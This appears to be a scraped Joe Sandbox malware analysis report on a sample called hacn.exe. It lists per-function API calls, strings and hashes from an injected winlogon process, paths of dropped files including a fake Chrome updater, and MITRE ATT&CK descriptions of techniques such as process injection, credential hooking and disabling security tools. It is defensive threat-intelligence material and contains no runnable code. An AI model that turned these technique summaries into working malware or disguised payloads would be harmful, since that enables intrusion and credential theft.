Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: 2131E62935EE60F1EE21DBCAA408B653398BB48BA6F5985259D1F0B798DF39C447C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC653DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000225DC653DE5
GetLastError.KERNEL32 ref: 00000225DC653DF1
CloseHandle.KERNEL32 ref: 00000225DC653E09
CreateFileW.KERNEL32 ref: 00000225DC653E34
WriteConsoleW.KERNEL32 ref: 00000225DC653E53

Strings

CONOUT$, xrefs: 00000225DC653E15

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: 158becd88709c9cbcacd230cd8387edf0a13bed790f97ee48f9835d8b457c441
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 5A119135720F6096E7608BDAE84831977A0F788FE6F248225EB5E877A4CF78C914C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC642F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC642F27
HeapAlloc.KERNEL32 ref: 00000225DC642F3A
StrCmpNIW.SHLWAPI ref: 00000225DC642FAF
GetProcessHeap.KERNEL32 ref: 00000225DC643015
HeapFree.KERNEL32 ref: 00000225DC643023

Strings

dialer, xrefs: 00000225DC642FA8

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: 2e98920b3895b546e8cfee93848436d20f1d91fbd890dc42e4983bef65e91d92
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: 9131CE2A309F65A2EB52CFDEE54872A77A0FB44B86F18C1209F4A47B55EF34C4A1C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC64199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000225DC6419C2
K32GetModuleFileNameExW.KERNEL32 ref: 00000225DC6419E0
PathFindFileNameW.SHLWAPI ref: 00000225DC6419EF
lstrlenW.KERNEL32 ref: 00000225DC6419FB
StrCpyW.SHLWAPI ref: 00000225DC641A0E
CloseHandle.KERNEL32 ref: 00000225DC641A1C

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: c75f4c628c11a50a5007a532dfe706c93d8ee4e04b1e1be502c9ae2a36d6589c
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: 0E016929314E5092EB60DB9AA84C35963A1F788BC6F988075DF8A43754DF3CC989C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC641A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000225DC641A60
StrCmpNIW.SHLWAPI ref: 00000225DC641A7A
lstrlenW.KERNEL32 ref: 00000225DC641A89
StrCpyW.SHLWAPI ref: 00000225DC641A9E

Strings

\\?\, xrefs: 00000225DC641A6E

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: e535c0649dfb5c656df934673802aa2881829a80634b4f76755b7f08d64bed47
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: 69F04466718E51A2E7608BE9F9887596761F748BC9F94C020DB4A46654DF3CC68DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC623504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000225DC62352C
_set_statfp.LIBCMT ref: 00000225DC623547
_set_statfp.LIBCMT ref: 00000225DC623563
_set_statfp.LIBCMT ref: 00000225DC62359F

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 0f0cd1f3b4902091acada321e62a835e8ba03bea7c675b6eead67c7f9176ca24
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 6B11C63AA60E3131FB6415ECE45D37991C86B58BB6F48C639A97F2E3D6CB34C881C200

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC61F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000225DC61F124

Strings

Tuesday, xrefs: 00000225DC61F0F4
or copy constructor iterator', xrefs: 00000225DC61F25A, 00000225DC61F275
Wednesday, xrefs: 00000225DC61F1ED

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: 944570b48e0c60bc5ad5e959f3b97a539a301ff4876b6c2567b65f1bc9dbc55e
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: 2961E27E606E6066FE69CBFCE55D32E66A0F785793F54C415EA0A037A4DB34C842C302

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC64AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000225DC64AA68
_CallSETranslator.LIBVCRUNTIME ref: 00000225DC64AAB7

Strings

MOC, xrefs: 00000225DC64AA7C
RCC, xrefs: 00000225DC64AA85

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 5ee5bc15fcc7ca4683ce8519a978933ac552fc7779cbca0cf07b2e2c35c6d78e
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 6561CF3B608F94AAEB20DFA9D04439D7BA1F348B8DF148255EF4A17B99DB38C085C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC61A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000225DC61A1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000225DC61A288

Strings

csm, xrefs: 00000225DC61A1C2
csm, xrefs: 00000225DC61A2DA

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 4352b4e7d2f757b2eeab07a41cb79b5cce5006a568909e68af21b5ba570d396d
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 9B51C23A105BA0EAEF748F99944835877A0F355B97F28C215EB89C7BD6CB38C451C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC618405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000225DC618413
_IsNonwritableInCurrentImage.LIBCMT ref: 00000225DC6184A8

Strings

f, xrefs: 00000225DC618426
csm, xrefs: 00000225DC61848E

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 8a2ee0853dea6fc810b70285cdad8afa924fb268fca63da5ab5c18953c58d14e
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 9F51BF3A712A20AAEF94CF99E448B1937A5F358B9FF52C224DE0647788EB34CC41C704

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC6183E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000225DC618413
_IsNonwritableInCurrentImage.LIBCMT ref: 00000225DC6184A8

Strings

f, xrefs: 00000225DC618426
csm, xrefs: 00000225DC61848E

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: a13f22b0c5ddbfd73ffef1e451b0b481ee6602808d75d20c911345d57e3c4186
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: A731C03A602B60A6EB64DF5AE84871977A4F748BDFF16C214EE5B47784DB38C940C704

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC619E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000225DC619EB7

Strings

MOC, xrefs: 00000225DC619E7C
RCC, xrefs: 00000225DC619E85

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 1c103488b81b5755e9a858689f9c8f9220dbcbf2f2fcf3c8ea21b2028d61d58d
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: C5619D3B602F549AEB20CFA9D44439D7BA0F748B8EF148215EF4917B99DB38D156C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC6526F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000225DC652807
GetLastError.KERNEL32 ref: 00000225DC652829

Strings

U, xrefs: 00000225DC6527B3

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: ff598f2dff618ae855125180d135eff0feb50115b417593be16094bb43c2f728
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: BC41C476325E90A6DB21CFA9E8483AE77A0F798795F508021EE4E87794EB7CC445C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC617356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00000225DC61737C

Strings

ierarchy Descriptor', xrefs: 00000225DC617381
riptor at (, xrefs: 00000225DC617364

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: 40d697394cd767119a46280874914b4daa5d8e9346db535fcc515f98333aa0ca
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: 7EE08661A41F84A0DF118F66E8442D873A0DB58B69B48D122995C46311FA38D1E9C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC6173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00000225DC6173D8

Strings

Locator', xrefs: 00000225DC6173DD
riptor at (, xrefs: 00000225DC6173C0

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: 33387b3a89b0f7cf97b4c9f63ea1e6ce0b438a2dcf969175634c70bf0c094b31
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: F9E0CD61A01F44D0DF118F65D4441D87360E75CB69F88D222CD4C47311FB38D1E5C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC641268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC64126E
HeapAlloc.KERNEL32 ref: 00000225DC64127D
GetProcessHeap.KERNEL32 ref: 00000225DC641297
HeapAlloc.KERNEL32 ref: 00000225DC6412A8

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: 46137aeb2ac080d4014b8e101a3abee4704eba82c5d2520b876412a79b8151bf
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 77E06D39621E1486EB548FEAD80C36A36E1FB89F06F14C024CA0907751DF7DC499C750

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hacn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\ProgramData\main.exe

C:\ProgramData\setup.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\main.exe.log

C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Windows Analysis Report
hacn.exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
